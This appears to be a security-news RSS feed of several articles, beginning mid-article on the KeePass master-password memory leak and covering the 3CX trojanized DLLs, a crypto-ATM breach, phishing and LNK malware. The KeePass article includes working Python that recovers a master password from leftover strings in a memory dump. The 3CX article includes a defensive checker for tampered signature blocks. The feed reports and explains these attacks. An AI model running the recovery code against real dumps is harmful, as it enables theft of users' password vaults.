A researcher by the name of vdohney built a proof-of-concept tool and gave it the suitable moniker “KeePass Master Password Dumper” in order to draw attention to this issue. This program provides a clear demonstration of how the master password might be retrieved from KeePass’s memory with the exception of the first character. This can be done without needing code to be executed on the machine that is being targeted, and it can be done even if the workspace is locked or if KeePass is no longer operating.

When entering passwords, KeePass 2.X makes use of a text box that was built specifically for it called SecureTextBoxEx. This text box is utilized not just for the insertion of the master password, but also in other locations in KeePass, such as password edit boxes (which means that the attack may also be used to retrieve the contents of other password edit boxes).

The vulnerability is that a leftover string is created in memory for each character that is entered. Because .NET strings are immutable, every keystroke produces a new string object, and the earlier ones cannot be reliably wiped. For instance, when the word “Password” is entered, it will leave behind the following strings: •a, ••s, •••s, ••••w, •••••o, ••••••r, •••••••d. The proof-of-concept program looks through the dump for these patterns and suggests a possible character for each position in the password.

How reliable the attack is depends on how the password was typed and how many passwords were entered during a session. However, the way the .NET CLR allocates these strings means they tend to be well ordered in memory, even when several passwords were used in one session or typing mistakes were made. So if three distinct passwords were entered, you will most likely get three candidates for each character position, in the order they were typed, which lets you recover all three.
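The pattern search the two paragraphs above describe, as an added example for this article: it is not vdohney's proof-of-concept, and the "dump" is a constructed byte string rather than a real process dump. It assumes the masking character is U+25CF BLACK CIRCLE (rendered as a plain bullet in the text above) and that the leftover strings are UTF-16LE like every .NET string; pass a different mask if a build uses another character.

```python
"""Recover a KeePass 2.x master password from per-keystroke leftover strings
(CVE-2023-32784). Added example for this article; the dump is constructed."""
import re
from collections import defaultdict

MASK = "\u25cf"   # assumed masking character of SecureTextBoxEx

def make_fake_dump(typed_passwords, mask=MASK):
    """Emulate what typing each password leaves behind: the k-th keystroke
    (0-based, k >= 1) produces an immutable .NET string of k masks followed by
    that character, UTF-16LE encoded. The first character never gets such a
    string, which is why it cannot be recovered."""
    chunks = [b"\0" * 32]
    for pw in typed_passwords:
        for k in range(1, len(pw)):
            chunks.append((mask * k + pw[k]).encode("utf-16-le"))
            chunks.append(b"\0" * 16)      # stand-in for object headers and unrelated data
    return b"".join(chunks)

def find_candidates(dump, mask=MASK):
    """Scan for runs of the mask followed by one UTF-16 code unit and group the
    trailing characters by position (= number of masks), in order of discovery."""
    mask_le = re.escape(mask.encode("utf-16-le"))
    pattern = re.compile(b"((?:" + mask_le + b")+)(..)", re.DOTALL)
    found = defaultdict(list)
    for m in pattern.finditer(dump):
        pos = len(m.group(1)) // 2
        ch = m.group(2).decode("utf-16-le", errors="replace")
        if ch.isprintable() and ch not in (mask, "\ufffd") and ch not in found[pos]:
            found[pos].append(ch)
    return dict(found)

def reconstruct(candidates, unknown="?"):
    """Best guess: first candidate seen at each position; position 0 is unknowable."""
    if not candidates:
        return ""
    length = max(candidates) + 1
    return unknown + "".join(candidates.get(i, [unknown])[0] for i in range(1, length))

if __name__ == "__main__":
    dump = make_fake_dump(["Password", "Passw0rd"])
    cands = find_candidates(dump)
    print(reconstruct(cands))          # ?assword
    print({p: c for p, c in cands.items() if len(c) > 1})   # {5: ['o', '0']}
```

With two passwords typed in one session the scan returns two candidates at position 5, in typing order, and one everywhere else; against a real dump the mask runs are interleaved with other heap data, so a tool has to tolerate noise between them, but the per-position grouping is the same.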

Should You Be Concerned About This?
It depends on your threat model. If your machine is already infected with malware running in the background with your user's rights, this discovery does not make things significantly worse. On the other hand, unlike KeeTheft and KeeFarce, this technique needs no process injection or other code execution on the target, which makes it easier for malware to stay stealthy and evade antivirus software.

It might be a problem if you have a reasonable suspicion that someone could get access to your computer and undertake forensic examination. Even if KeePass is completely shut down or secured, it is still possible for the master password to be rediscovered. This is the worst-case situation.

If your machine is clean and you use full disk encryption with a strong password, you should be fine. This discovery does not let anyone steal your credentials remotely over the internet; the attacker still needs a memory dump, swap file or hibernation file taken from the machine.

d3dcompiler_47.dll: If AV raises an alerts about this Microsoft signed dll file, you are in trouble
https://www.securitynewspaper.com/2023/03/31/d3dcompiler_47-dll-if-av-raises-an-alerts-about-this-microsoft-signed-dll-file-you-are-in-trouble/ Fri, 31 Mar 2023 21:10:52 +0000
According to security experts, threat actors trojanized a widely used corporate communication product from 3CX. Reports state that the desktop client for the 3CX VoIP (Voice over Internet Protocol) service was used to specifically target 3CX's customers.

The attack is believed to be a multi-stage process, with the first stage being a trojanized version of the 3CX desktop application. Although the .exe installer and the MSI package carry the same name, preliminary research indicates that the MSI package is the one containing the maliciously modified DLLs.

The infection process begins when 3CXDesktopApp.exe loads the ffmpeg.dll file. ffmpeg.dll then reads the encrypted code from d3dcompiler_47.dll and decrypts it. The decrypted code appears to be the backdoor payload, which attempts to visit the IconStorage GitHub page in order to fetch an ICO file containing the encrypted C&C server address that the backdoor connects to in order to acquire the likely final payload.

It is not a coincidence that the threat actors responsible for this attack chose these two DLLs (ffmpeg and d3dcompiler_47). The application in question, 3CXDesktopApp, was developed using the open-source framework Electron, and both libraries are commonly distributed along with the Electron runtime. As a result, they are very unlikely to arouse suspicion in customer environments. In addition, the tampered file, d3dcompiler_47, is signed with a certificate issued to Microsoft Corporation, and the digital signature details shown by Windows report no problems with the signature. A signed binary carrying a valid certificate from a trusted company such as Microsoft is more likely to be given the "green light" by endpoint protection products.

In this instance, the "smoking gun" was the combination of RC4-encrypted shellcode inserted into the signature appendix of d3dcompiler_47.dll and a reference to that library added to ffmpeg.dll.

Windows normally shows a notification saying that the "digital signature of the object did not verify" whenever a signed executable is modified, yet even though we know the d3dcompiler_47.dll DLL was altered, Windows continued to present it as validly signed.

It seems the DLL is abusing the CVE-2013-3900 flaw, which is referred to as a “WinVerifyTrust Signature Validation Vulnerability.”

Microsoft publicly disclosed this vulnerability on December 10, 2013. At the time, the company explained that it is possible to add content to the Authenticode signature section of a signed executable (the WIN_CERTIFICATE structure) without rendering the signature invalid.

Microsoft ultimately decided to make the fix optional, most likely because enforcing it would invalidate genuine, signed executables that store data in the signature block.

According to Microsoft's disclosure for CVE-2013-3900, the company changed the way signatures are verified for binaries signed with the Windows Authenticode signature format with an update released on December 10, 2013, made available for all supported releases of Microsoft Windows.

This modification is activated on an opt-in basis. When the new behavior for Windows Authenticode signature verification is enabled, Windows no longer regards non-compliant binaries as signed, and it no longer allows extraneous information to be stored in the WIN_CERTIFICATE structure.

Even though close to 10 years have passed since the vulnerability was disclosed, and even though several threat actors are known to exploit it, the remedy is still an opt-in feature that can only be activated by manually modifying the Windows Registry. To make things worse, even if you add the Registry entries to apply the fix, they are deleted when you upgrade to Windows 11, leaving your device vulnerable once again.
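As an added example (not code from the article, 3CX or Microsoft), the following Python locates a PE file's certificate table and reports any bytes sitting after the PKCS#7 SignedData inside the WIN_CERTIFICATE structure, which is exactly the slack that CVE-2013-3900 leaves unchecked unless the opt-in fix is enabled. The rule that only zero bytes rounding the entry up to 8-byte alignment count as benign padding is an assumption, and the sample blobs are constructed data rather than real signatures.

```python
# Added example, not code from the article: a read-only check for the CVE-2013-3900 condition,
# i.e. data appended to the WIN_CERTIFICATE structure that carries a PE file's Authenticode
# signature. The DER and PE parsing is deliberately minimal and assumes well-formed input.
import struct

WIN_CERT_REVISION_2_0 = 0x0200           # revision used by Authenticode
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002  # bCertificate holds a PKCS#7 SignedData blob
IMAGE_DIRECTORY_ENTRY_SECURITY = 4       # data directory slot of the certificate table


def der_total_length(data: bytes) -> int:
    """Total encoded size (tag + length + contents) of the DER element at data[0]."""
    if len(data) < 2:
        raise ValueError("truncated DER header")
    first = data[1]
    if first < 0x80:                     # short form: one length byte
        return 2 + first
    n = first & 0x7F                     # long form: n length bytes follow
    if n == 0 or n > 4 or len(data) < 2 + n:
        raise ValueError("unsupported or truncated DER length")
    return 2 + n + int.from_bytes(data[2:2 + n], "big")


def extract_win_certificate(pe: bytes) -> bytes:
    """Raw certificate table of a PE image; its directory entry holds a file offset, not an RVA."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    opt = e_lfanew + 4 + 20              # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    dir_base = opt + (96 if magic == 0x10B else 112)  # PE32 vs PE32+ data directory start
    off, size = struct.unpack_from("<II", pe, dir_base + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)
    if off == 0 or size == 0:
        raise ValueError("image carries no Authenticode signature")
    return pe[off:off + size]


def check_win_certificate(blob: bytes) -> dict:
    """Parse one WIN_CERTIFICATE and report any bytes beyond its PKCS#7 SignedData."""
    if len(blob) < 8:
        raise ValueError("blob shorter than the WIN_CERTIFICATE header")
    dw_length, revision, cert_type = struct.unpack_from("<IHH", blob, 0)
    if dw_length > len(blob):
        raise ValueError("dwLength exceeds the available data")
    cert = blob[8:dw_length]
    if cert[:1] != b"\x30":
        raise ValueError("bCertificate does not start with a DER SEQUENCE")
    pkcs7_len = der_total_length(cert)
    trailing = cert[pkcs7_len:]
    # Assumption: zero bytes that merely round the entry up to 8-byte alignment are benign
    # padding; anything else after the SignedData is appended content (the CVE-2013-3900 case).
    slack = trailing[:(-pkcs7_len) % 8]
    padding = len(slack) if all(b == 0 for b in slack) else 0
    appended = len(trailing) - padding
    return {"dwLength": dw_length, "pkcs7_length": pkcs7_len, "padding_bytes": padding,
            "appended_bytes": appended, "compliant": appended == 0,
            "header_ok": revision == WIN_CERT_REVISION_2_0
            and cert_type == WIN_CERT_TYPE_PKCS_SIGNED_DATA}


def make_blob(payload: bytes, extra: bytes = b"") -> bytes:
    """Constructed sample: wrap a fake DER SEQUENCE (not a real SignedData) in a WIN_CERTIFICATE,
    optionally with `extra` appended the way the trojanised d3dcompiler_47.dll carried shellcode."""
    if len(payload) < 0x80:
        length = bytes([len(payload)])
    else:                                # long-form DER length
        lb = len(payload).to_bytes((len(payload).bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    body = b"\x30" + length + payload + extra
    pad = (-(8 + len(body))) % 8         # Windows rounds dwLength up to a multiple of 8
    return struct.pack("<IHH", 8 + len(body) + pad, WIN_CERT_REVISION_2_0,
                       WIN_CERT_TYPE_PKCS_SIGNED_DATA) + body + b"\0" * pad
```

On a real file, `check_win_certificate(extract_win_certificate(open(path, "rb").read()))` reports `appended_bytes` greater than zero for a binary that carries data in its signature block; the cryptographic validity of the signature itself is not checked here.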

Companies that are possibly impacted should immediately stop using the vulnerable version of the software and its DLLs if at all feasible, and apply any patches or mitigating measures that are available. IT and security personnel should also search for known compromised binaries and builds and watch for abnormal activity in 3CX processes, with particular attention to C&C traffic.

In the meantime, enabling behavioral monitoring in security solutions may help determine whether an attack is currently taking place inside the system.


]]>
How Cryptocurrency ATM manufacturer was hacked and millions of funds were stolen? https://www.securitynewspaper.com/2023/03/21/how-cryptocurrency-atm-manufacturer-was-hacked-and-millions-of-funds-were-stolen/ Tue, 21 Mar 2023 18:58:58 +0000 https://www.securitynewspaper.com/?p=26442 General Bytes, a leading producer of cryptocurrency automated teller machines (ATMs), was the victim of a security breach that resulted in the loss of more than $1.5 million in Bitcoin.Read More →

The post How Cryptocurrency ATM manufacturer was hacked and millions of funds were stolen? appeared first on Information Security Newspaper | Hacking News.

]]>
General Bytes, a leading producer of cryptocurrency automated teller machines (ATMs), was the victim of a security breach that resulted in the loss of more than $1.5 million in Bitcoin. General Bytes originally reported the event on its official Twitter account. According to the company, the attackers exploited a vulnerability in the master service interface used by Bitcoin ATMs to upload videos, allowing them to upload a JavaScript script and execute it with batm user rights.

According to the firm, "the attacker scanned the Digital Ocean cloud hosting IP address space and identified running CAS services on port 7741, including the General Bytes Cloud service and other GB ATM operators running their servers on Digital Ocean."

As a result of the code execution, the attackers gained access to the database as well as the API keys used to access funds in hot wallets and exchanges. The attacker leveraged the master service interface to remotely upload a Java program, gaining batm user rights, the database, and the API keys required to access funds in hot wallets and exchanges.

As a consequence, the hacker gained access to user names and password hashes, turned off two-factor authentication, and sent funds from hot wallets.

The hacker succeeded in stealing 56.28 bitcoin, worth around $1.5 million, and also liquidated other cryptocurrencies such as ETH, USDT, BUSD, ADA, DAI, DOGE, SHIB, and TRX. The stolen bitcoin has not been moved from the attacker's address since March 18, while some of the other digital currencies have been transferred to other destinations, including a decentralized trading platform.

Additionally, the attackers gained the "ability to access terminal event logs and search for each occurrence when users scanned a private key at the ATM," information that earlier versions of the ATM software recorded.

“On March 18, we advise all of our clients to take quick steps to safeguard their finances and personal information,” General Bytes tweeted.

The firm has published the wallet addresses and three IP addresses used by the attacker in the breach. However, according to some sources, the company's full node is secure enough to prevent unauthorized access to funds.

In a security advisory documenting the event, the company released details of the actions clients should take to safeguard their GB ATM servers (CAS), emphasizing that even those who were not affected by the incident should adopt the recommended security measures.

"Please keep your CAS protected by a firewall and a VPN. Terminals should also use VPN to connect to CAS. With a VPN/Firewall, attackers from the open internet are unable to access and exploit your server. If your server was compromised, please reinstall the whole server, including the operating system," the business advises.

The crypto ATM manufacturer issued a CAS security patch and advised customers to consider all user passwords and API keys to exchanges and hot wallets as compromised and to replace them.

"We don't have the final statistics yet," General Bytes said. "We're currently gathering information from operators. We are still dealing with damage of roughly 56 BTC as of today."


]]>
US extradites Russian hacker accused of creating password-cracking software https://www.securitynewspaper.com/2023/02/27/us-extradites-russian-hacker-accused-of-creating-password-cracking-software/ Tue, 28 Feb 2023 00:06:15 +0000 https://www.securitynewspaper.com/?p=26362 Tampa, Florida – Dariy Pankov, also known as “dpxaker,” has been taken into custody, and United States Attorney Roger B. Handberg has made the announcement. Pankov is being investigated forRead More →

The post US extradites Russian hacker accused of creating password-cracking software appeared first on Information Security Newspaper | Hacking News.

]]>
Tampa, Florida – Dariy Pankov, also known as “dpxaker,” has been taken into custody, and United States Attorney Roger B. Handberg has made the announcement. Pankov is being investigated for conspiracy, fraud using access devices, and computer fraud. Should he be found guilty on all charges, he may be sentenced to a maximum of 47 years in a federal prison. In addition, the indictment serves as notice to Pankov that the United States government seeks to seize and forfeit the sum of $358,437, which is believed to be derived from the profits of the crimes. On October 4, 2022, Georgian officials in the Republic of Georgia apprehended Pankov, a citizen and resident of Russia. Pankov was later extradited to the United States in response to a request from the United States. On February 21, 2023, in Tampa, Florida, Pankov appeared in front of United States Magistrate Christopher P. Tuite, who issued a warrant for Pankov’s arrest until the outcome of his trial.

According to the indictment, Pankov created a piece of malicious software known as "NLBrute." The malware's capabilities included cracking login credentials such as passwords, which allowed it to compromise otherwise secure machines. Using NLBrute, Pankov obtained the login credentials of tens of thousands of machines located around the globe. He advertised NLBrute to other online criminals, sold it to them himself, and paid others to sell it on his behalf. Pankov sold the stolen login credentials on a dark web marketplace that specialized in buying and selling access to compromised systems.

Once sold, those credentials were used to facilitate a broad range of illicit activity, including tax fraud and ransomware attacks. Pankov earned more than $350,000 in illegal proceeds from the marketplace by selling the login credentials of more than 35,000 compromised machines.


]]>
New kind of phishing attacks are exploiting Microsoft OneNote to bypass disabled macro https://www.securitynewspaper.com/2023/01/25/new-kind-of-phishing-attacks-are-exploiting-microsoft-onenote-to-bypass-disabled-macro/ Wed, 25 Jan 2023 22:07:41 +0000 https://www.securitynewspaper.com/?p=26265 OneNote is one of the most popular components of the Microsoft 365 package, which the firm is still working to improve even as we speak by releasing new updates. However,Read More →

The post New kind of phishing attacks are exploiting Microsoft OneNote to bypass disabled macro appeared first on Information Security Newspaper | Hacking News.

]]>
OneNote is one of the most popular components of the Microsoft 365 suite, which Microsoft continues to improve through new updates. However, as the product undergoes continuous beta testing, hackers have discovered and exploited weaknesses in order to launch phishing-based malware attacks. Security professionals are now sounding the alarm about criminal actors who use OneNote files, delivered as attachments to phishing emails, to covertly implant malware on user machines.

Threat actors take advantage of the frequent feature updates that Microsoft makes to OneNote in order to install malware on users' computers by tricking them into double-clicking attachments in spam emails. This causes the user's computer to run a script that downloads malware from remote locations. Once infected, the device can be used not just to steal passwords but also to attack cryptocurrency wallets or to install other software without the user's knowledge.

Microsoft first blocked macros in its Office documents, which prevented malicious actors from using Excel and Word files to distribute malware. In addition, Microsoft restricted ZIP and ISO files so that users cannot open them without first going through a series of security warnings. Hackers have since discovered ways around the macro block that allow them to spread malware. Phishing emails may carry a variety of bogus attachments, including fraudulent invoices, delivery confirmations, or alerts, amongst other things.

Most of the time, the images in the attachment are obscured and carry the prompt "Double Click to View File." Doing so actually launches a malicious Visual Basic script file, which contacts a remote server to install malware, which may include a range of trojans. The file is designed to exploit vulnerabilities in Microsoft's Visual Basic programming language.

Microsoft has already put a stop to the mining of cryptocurrencies on its network, since this activity is often associated with unlawful user access. Because of this, there has been a dramatic reduction in the deterioration and interruption of cloud services.

However, in order for OneNote users to fully protect themselves, it is essential that they do not dismiss warnings shown by the program and that they use multi-factor authentication, antivirus software, and firewalls wherever practicable. In addition, they should refrain from downloading attachments from email sources they do not recognize.


]]>
Central Pro, Join.me, Hamachi, and RemotelyAnywhere services encrypted backups and keys hacked https://www.securitynewspaper.com/2023/01/24/central-pro-join-me-hamachi-and-remotelyanywhere-services-encrypted-backups-and-keys-hacked/ Tue, 24 Jan 2023 23:59:24 +0000 https://www.securitynewspaper.com/?p=26263 GoTo, a company that provides software, said on Monday, January 23, that a hacker had stolen encrypted backups for its Central, Pro, Join.me, and Hamachi services. RemotelyAnywhere was also affected.Read More →

The post Central Pro, Join.me, Hamachi, and RemotelyAnywhere services encrypted backups and keys hacked appeared first on Information Security Newspaper | Hacking News.

]]>
GoTo, a company that provides software, said on Monday, January 23, that a hacker had stolen encrypted backups for its Central, Pro, Join.me, and Hamachi services. RemotelyAnywhere was also affected.

Worse still, the company found evidence that the attacker also stole an encryption key for a portion of the encrypted backups, which makes the situation much more serious. The only logical conclusion is that decrypting these backup files would disclose private customer information.

According to GoTo, the data that might have been compromised include usernames associated with accounts, passwords that have been salted and hashed, some Multi-Factor Authentication (MFA) settings, as well as certain application settings and licensing information.

Both GoTo Rescue and GoToMyPC provide customers with the ability to access a computer remotely through the internet. The malicious hacker was successful in obtaining the MFA settings for a portion of those users.

The problem started when a malicious actor obtained access to a cloud storage provider that both LastPass and GoTo make use of. GoTo was the company that was hacked first.

Because the security breach at LastPass was so serious, the company was forced to hand over to the hacker not just customers’ data encryption vaults but also a vast quantity of additional exposed personal information pertaining to users.

The data stored in LastPass vaults is encrypted; nonetheless, if a hacker were to obtain the vault master passwords, the data could be decrypted. There are two ways to obtain them: manual guessing or automated cracking tools.

GoTo has not yet disclosed the potentially large number of users affected by this incident. Nevertheless, according to the company's statement from the previous year, it had 800,000 customers. Products like GoTo Central and Pro are designed to give IT staff the ability to oversee their operations from a remote location. Hamachi is a hosted virtual private network (VPN) service, while Join.me is an online meeting facilitator.

As a result of the incident, customer accounts that use GoTo products may be more susceptible to attack. It should come as no surprise that those who depend on GoTo's remote access software find this to be upsetting news. In response, the company has reset the passwords of affected users and introduced multi-factor authentication (MFA).

The company makes direct human contact with customers who have expressed concern in order to provide further information, as well as to suggest potential solutions to the problems.

According to the company's statement, "In addition, we are migrating their accounts onto an enhanced Identity Management Platform," which will provide additional security with more robust authentication and login-based security options.

Because GoTo does not collect data such as dates of birth, home addresses, or Social Security numbers, the company has said that the breach did not result in the loss or theft of any such sensitive information. Despite this, it is possible that customers will lose trust in the company as a result of the incident.


]]>
LNK files is one of the most common way of hacking into enterprise environment https://www.securitynewspaper.com/2022/08/10/lnk-files-is-one-of-the-most-common-way-of-hacking-into-enterprise-environment/ Wed, 10 Aug 2022 19:25:12 +0000 https://www.securitynewspaper.com/?p=25597 HP has highlighted a new wave of cybercriminals who spread families of ‘malware’ in business environments using files with shortcuts or links (so-called LNK) to distribute ‘malware’. It is oneRead More →

The post LNK files is one of the most common way of hacking into enterprise environment appeared first on Information Security Newspaper | Hacking News.

]]>
HP has highlighted a new wave of cybercriminals who spread 'malware' families in business environments using shortcut or link files (so-called LNK files). It is one of the conclusions of its latest global report, which analyzes real-world cyber attacks and focuses on the methods most used to threaten companies and organizations.

Specifically, the technology company points out that there has been a wave of cyberattacks led by 'malware' families such as QakBot, IceID, Emotet and RedLine Stealer, all using files with the '.lnk' extension.

LNKs are Windows shortcut files that can contain malicious code and are used to abuse legitimate system tools, for example to run Microsoft HTML application files. According to HP, shortcuts are replacing Office macros because macros now require too much user intervention and trigger too many security warnings. In this way, shortcuts become a trap through which attackers trick their victims into infecting their PCs. The resulting access to company systems can be used to steal sensitive company information or to sell it to 'ransomware' groups, which can lead to large-scale data breaches.

It is therefore not surprising that HP's analysis found an 11 percent increase in compressed files containing 'malware', among which LNK files stand out. Specifically, attackers commonly place shortcut files inside ZIP attachments in order to evade email security scanners in business environments.

Additionally, the research team has detected LNK malware kits for sale on hacker forums, making it easier for cybercriminals to adopt this technique for executing malicious code. Separately, HP has exposed another case in which attackers took advantage of the zero-day vulnerability in the Microsoft Support Diagnostic Tool (MSDT), also known as 'Follina', to distribute QakBot, Agent Tesla and the Remcos remote access Trojan before a patch was available.

Likewise, a new execution technique has been identified that spreads the SVCReady malware via shellcode hidden in documents. This campaign stands out precisely because of the unusual way in which it is delivered to PCs.

HP has highlighted other conclusions reached in this analysis and has pointed out that threat actors used a greater number of malware families in their attempts to infect organizations (593 compared to 545 in the previous quarter).

Likewise, the technology company has drawn attention to new malicious file formats used to evade detection, since its collected data indicates that 14 percent of email malware evaded at least one email gateway scanner.

HP has also highlighted that 69 percent of detected malware was sent via email, while web downloads were responsible for 17 percent of cyberattacks. Likewise, the most common 'phishing' lures were transaction themes such as 'Order', 'Payment', 'Purchase', 'Request' and 'Invoice'.


]]>